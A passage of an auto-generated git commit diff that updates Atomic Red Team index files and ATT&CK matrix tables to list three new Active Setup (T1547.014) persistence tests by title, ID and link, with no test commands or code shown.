Generated docs from job=generate-docs branch=master [ci skip]

2022-11-03 20:06:21 +00:00
parent 422ab1751f
commit f1fe367fc7
10 changed files with 310 additions and 12 deletions
@@ -479,6 +479,9 @@ privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo
 privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
+privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
+privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
+privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
 privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
@@ -720,6 +723,9 @@ persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
+persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
+persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
+persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
 persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
@@ -360,6 +360,9 @@ privilege-escalation,T1548.002,Abuse Elevation Control Mechanism: Bypass User Ac
 privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 privilege-escalation,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
+privilege-escalation,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
+privilege-escalation,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
+privilege-escalation,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 privilege-escalation,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
@@ -538,6 +541,9 @@ persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via t
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
+persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
+persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
+persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
 persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
 persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
@@ -716,7 +716,10 @@
  - Atomic Test #1: Add a driver [windows]
 - T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
+  - Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
+  - Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
+  - Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
 - [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
  - Atomic Test #1: Add Federation to Azure AD [azure-ad]
 - [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
@@ -1147,7 +1150,10 @@
 - [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
  - Atomic Test #1: Add a driver [windows]
 - T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
+  - Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
+  - Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
+  - Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
 - T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
@@ -541,7 +541,10 @@
 - [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
  - Atomic Test #1: Add a driver [windows]
 - T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
+  - Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
+  - Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
+  - Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
  - Atomic Test #1: Modify Fax service to run PowerShell [windows]
@@ -850,7 +853,10 @@
 - [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
  - Atomic Test #1: Add a driver [windows]
 - T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
+  - Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
+  - Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
+  - Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
 - T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
  - Atomic Test #1: Modify Fax service to run PowerShell [windows]
@@ -19,11 +19,11 @@
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Kubernetes Cronjob](../../T1053.007/T1053.007.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Access Control](../../T1548.002/T1548.002.md) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Window Discovery](../../T1010/T1010.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
-| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Device Configuration Dump [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Modification](../../T1484.002/T1484.002.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) |  | Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-|  | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+|  | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | [Kubernetes Exec Into Container](../../T1609/T1609.md) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [File and Directory Discovery](../../T1083/T1083.md) | Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Video Capture](../../T1125/T1125.md) |  | Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 |  | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | [System Network Connections Discovery](../../T1049/T1049.md) | Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Destruction](../../T1485/T1485.md) |
@@ -13,9 +13,9 @@
 | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Native API](../../T1106/T1106.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Access Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Active Setup](../../T1547.014/T1547.014.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Information Discovery](../../T1082/T1082.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A 